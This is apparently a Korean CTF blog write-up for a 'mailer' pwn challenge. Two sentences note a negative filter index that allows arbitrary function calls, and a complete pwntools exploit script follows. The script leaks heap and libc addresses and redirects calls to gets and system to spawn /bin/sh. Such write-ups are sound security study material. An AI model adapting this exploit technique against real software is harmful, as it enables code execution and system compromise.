취약점은 post의 filter를 선택할때 발생한다. 음수를 입력할 수 있으며 원하는 함수를 실행시킬 수 있다. : )
이부분을 이용해서 leak도 하고 /bin/sh까지 실행할 수 있다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 | from pwn import * s = process("./mailer") elf = ELF("./mailer") libc = ELF("./libc.so.6") def add(content): s.sendlineafter("> ","1") s.sendlineafter("contents: ",content) def delete(index): s.sendlineafter("> ","2") s.sendlineafter(":",str(index)) def post(index,filter_index): s.sendlineafter("> ","3") s.sendlineafter(":",str(index)) s.sendlineafter(">",str(filter_index)) add(p32(0x08048D01)+"A"*8) post(0,0) post(0,-7) s.recv(1) s.recv(4) heap_leak = u32(s.recv(4)) print "heap_leak : " + hex(heap_leak) heap_base = heap_leak - 0x168 print "heap_base : " + hex(heap_base) delete(0) add("A"*52) post(0,-4) post(0,-7) s.recv(1) s.recv(52) leak = u32(s.recv(4)) print "leak : " + hex(leak) libc_base = leak - 0x1b2cc0 print "libc_base : " + hex(libc_base) system = libc_base + libc.symbols['system'] gets = libc_base + libc.symbols['gets'] print "system : " + hex(system) print "gets : " + hex(gets) post(0,(heap_leak - 0x0804B048 - 0x100000000)/4) add(p32(gets)+p32(system)) post(0,0) post(0,((heap_base + 0x12d0) - 0x0804B048 - 0x100000000)/4) s.sendline("/bin/sh\x00") post(0,((heap_base + 0x12d4) - 0x0804B048 - 0x100000000)/4) s.interactive() | cs |
| [33C3_2016] Babyfengshui (0) | 2019.12.06 |
|---|---|
| [0CTF_2018] Babystack (0) | 2019.12.03 |
| [CodeBlue_2017] simple_memo_pad (0) | 2019.12.01 |
| [RCTF_2018] Rnote4 (0) | 2019.11.29 |
| [SCTF_2018] cowboy (0) | 2019.11.27 |